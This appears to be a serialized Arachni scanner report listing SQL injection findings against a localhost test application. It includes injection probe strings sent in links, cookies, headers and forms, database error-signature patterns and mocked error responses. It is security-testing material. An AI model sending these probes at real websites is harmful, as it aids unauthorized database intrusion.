tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:supplied argument is not a valid MySQL)
:match: supplied argument is not a valid MySQL
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/mysql/link/flip?input=default
:verification:
:id: supplied argument is not a valid MySQL
var: Parameter flip
url: http://localhost:7362/mysql/link/flip?input=default
injected: ''
id: supplied argument is not a valid MySQL
regexp: (?i-mx:supplied argument is not a valid MySQL)
regexp_match: supplied argument is not a valid MySQL
elem: link
remarks: {}
method: GET
response: ! '["supplied argument is not a valid MySQL\nColumn count doesn''t match
value count at row\nmysql_fetch_array()\non MySQL result index\nYou have an
error in your SQL syntax;\nYou have an error in your SQL syntax near\nMySQL
server version for the right syntax to use\n[MySQL][ODBC\nColumn count doesn''t
match\nTable ''Stuff'' doesn''t exist\nSQL syntax stuff MySQL\nWarning stuff
mysql_\nvalid MySQL result\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDA5
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: cookie2
url: http://localhost:7362/mysql/cookie/append
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:supplied argument is not a valid MySQL)
:match: supplied argument is not a valid MySQL
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value)
:injected: cookie value)
:combo:
!binary "Y29va2llMg==": cookie value)
:action: http://localhost:7362/mysql/cookie/append
:verification:
:id: supplied argument is not a valid MySQL
var: cookie2
url: http://localhost:7362/mysql/cookie/append
injected: cookie value)
id: supplied argument is not a valid MySQL
regexp: (?i-mx:supplied argument is not a valid MySQL)
regexp_match: supplied argument is not a valid MySQL
elem: cookie
remarks: {}
method: GET
response: ! 'supplied argument is not a valid MySQL
Column count doesn''t match value count at row
mysql_fetch_array()
on MySQL result index
You have an error in your SQL syntax;
You have an error in your SQL syntax near
MySQL server version for the right syntax to use
[MySQL][ODBC
Column count doesn''t match
Table ''Stuff'' doesn''t exist
SQL syntax stuff MySQL
Warning stuff mysql_
valid MySQL result
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value)
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mzg3
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/mysql/cookie/flip
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:supplied argument is not a valid MySQL)
:match: supplied argument is not a valid MySQL
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: Parameter flip
:element: cookie
:params: {}
:follow_location: true
:cookies:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/mysql/cookie/flip
:verification:
:id: supplied argument is not a valid MySQL
var: Parameter flip
url: http://localhost:7362/mysql/cookie/flip
injected: ''
id: supplied argument is not a valid MySQL
regexp: (?i-mx:supplied argument is not a valid MySQL)
regexp_match: supplied argument is not a valid MySQL
elem: cookie
remarks: {}
method: GET
response: ! '[nil, "supplied argument is not a valid MySQL\nColumn count doesn''t
match value count at row\nmysql_fetch_array()\non MySQL result index\nYou have
an error in your SQL syntax;\nYou have an error in your SQL syntax near\nMySQL
server version for the right syntax to use\n[MySQL][ODBC\nColumn count doesn''t
match\nTable ''Stuff'' doesn''t exist\nSQL syntax stuff MySQL\nWarning stuff
mysql_\nvalid MySQL result\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDA5
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzozOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/mysql/header/flip
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:supplied argument is not a valid MySQL)
:match: supplied argument is not a valid MySQL
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: header
:params:
:follow_location: true
:headers:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/mysql/header/flip
:verification:
:id: supplied argument is not a valid MySQL
var: Parameter flip
url: http://localhost:7362/mysql/header/flip
injected: ''
id: supplied argument is not a valid MySQL
regexp: (?i-mx:supplied argument is not a valid MySQL)
regexp_match: supplied argument is not a valid MySQL
elem: header
remarks: {}
method: GET
response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil, nil, "supplied argument is not a valid MySQL\nColumn count doesn''t
match value count at row\nmysql_fetch_array()\non MySQL result index\nYou have
an error in your SQL syntax;\nYou have an error in your SQL syntax near\nMySQL
server version for the right syntax to use\n[MySQL][ODBC\nColumn count doesn''t
match\nTable ''Stuff'' doesn''t exist\nSQL syntax stuff MySQL\nWarning stuff
mysql_\nvalid MySQL result\n", nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil, nil, nil, nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
! '''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NTU0
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzo1NCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: User-Agent
url: http://localhost:7362/mysql/header/append
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:supplied argument is not a valid MySQL)
:match: supplied argument is not a valid MySQL
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user'`--
:injected: arachni_user'`--
:combo:
User-Agent: arachni_user'`--
:action: http://localhost:7362/mysql/header/append
:verification:
:id: supplied argument is not a valid MySQL
var: User-Agent
url: http://localhost:7362/mysql/header/append
injected: arachni_user'`--
id: supplied argument is not a valid MySQL
regexp: (?i-mx:supplied argument is not a valid MySQL)
regexp_match: supplied argument is not a valid MySQL
elem: header
remarks: {}
method: GET
response: ! 'supplied argument is not a valid MySQL
Column count doesn''t match value count at row
mysql_fetch_array()
on MySQL result index
You have an error in your SQL syntax;
You have an error in your SQL syntax near
MySQL server version for the right syntax to use
[MySQL][ODBC
Column count doesn''t match
Table ''Stuff'' doesn''t exist
SQL syntax stuff MySQL
Warning stuff mysql_
valid MySQL result
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user'`--
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mzg3
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMzo1OCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/mssql/form/append
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
:match: System.Data.OleDb.OleDbException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default)
:follow_location: true
:injected: default)
:combo:
!binary "aW5wdXQ=": default)
:action: http://localhost:7362/mssql/form/append
:verification:
:id: System.Data.OleDb.OleDbException
var: input
url: http://localhost:7362/mssql/form/append
injected: default)
id: System.Data.OleDb.OleDbException
regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
regexp_match: System.Data.OleDb.OleDbException
elem: form
remarks: {}
method: GET
response: ! 'System.Data.OleDb.OleDbException
[Microsoft][ODBC SQL Server Driver]
[SQLServer JDBC Driver]
[SqlException
System.Data.SqlClient.SqlException
Unclosed quotation mark after the character string
''80040e14''
mssql_query()
Microsoft OLE DB Provider for ODBC Drivers
Microsoft OLE DB Provider for SQL Server
Incorrect syntax near
Sintaxis incorrecta cerca de
Syntax error in string in query expression
Procedure or function ''ColumnSeek'' expects parameter
Unclosed quotation mark before the character string
Syntax Error (missing operator) in query expression
Data type mismatch in criteria expression
ADODB.Field (0x800A0BCD)
[Microsoft][ODBC Microsoft Access Driver]
the used select statements have different number of columns
OLE DB stuff SQL Server
Warningstuff mssql_
Access stuff Driver
Driver stuff Access
JET Database Engine
Access Database Engine
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
ODQ5
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDowMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/mssql/form/flip
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
:match: System.Data.OleDb.OleDbException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: Parameter flip
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/mssql/form/flip
:verification:
:id: System.Data.OleDb.OleDbException
var: Parameter flip
url: http://localhost:7362/mssql/form/flip
injected: ''
id: System.Data.OleDb.OleDbException
regexp: (?i-mx:System\.Data\.OleDb\.OleDbException)
regexp_match: System.Data.OleDb.OleDbException
elem: form
remarks: {}
method: GET
response: ! '["System.Data.OleDb.OleDbException\n[Microsoft][ODBC SQL Server Driver]\n[SQLServer
JDBC Driver]\n[SqlException\nSystem.Data.SqlClient.SqlException\nUnclosed quotation
mark after the character string\n''80040e14''\nmssql_query()\nMicrosoft OLE
DB Provider for ODBC Drivers\nMicrosoft OLE DB Provider for SQL Server\nIncorrect
syntax near\nSintaxis incorrecta cerca de\nSyntax error in string in query expression\nProcedure
or function ''ColumnSeek'' expects parameter\nUnclosed quotation mark before
the character string\nSyntax Error (missing operator) in query expression\nData
type mismatch in criteria expression\nADODB.Field (0x800A0BCD)\n[Microsoft][ODBC
Microsoft Access Driver]\nthe used select statements have different number of
columns\nOLE DB stuff SQL Server\nWarningstuff mssql_\nAccess stuff Driver\nDriver
stuff Access\nJET Database Engine\nAccess Database Engine\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
ODg0
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDowMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/mssql/link/append?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
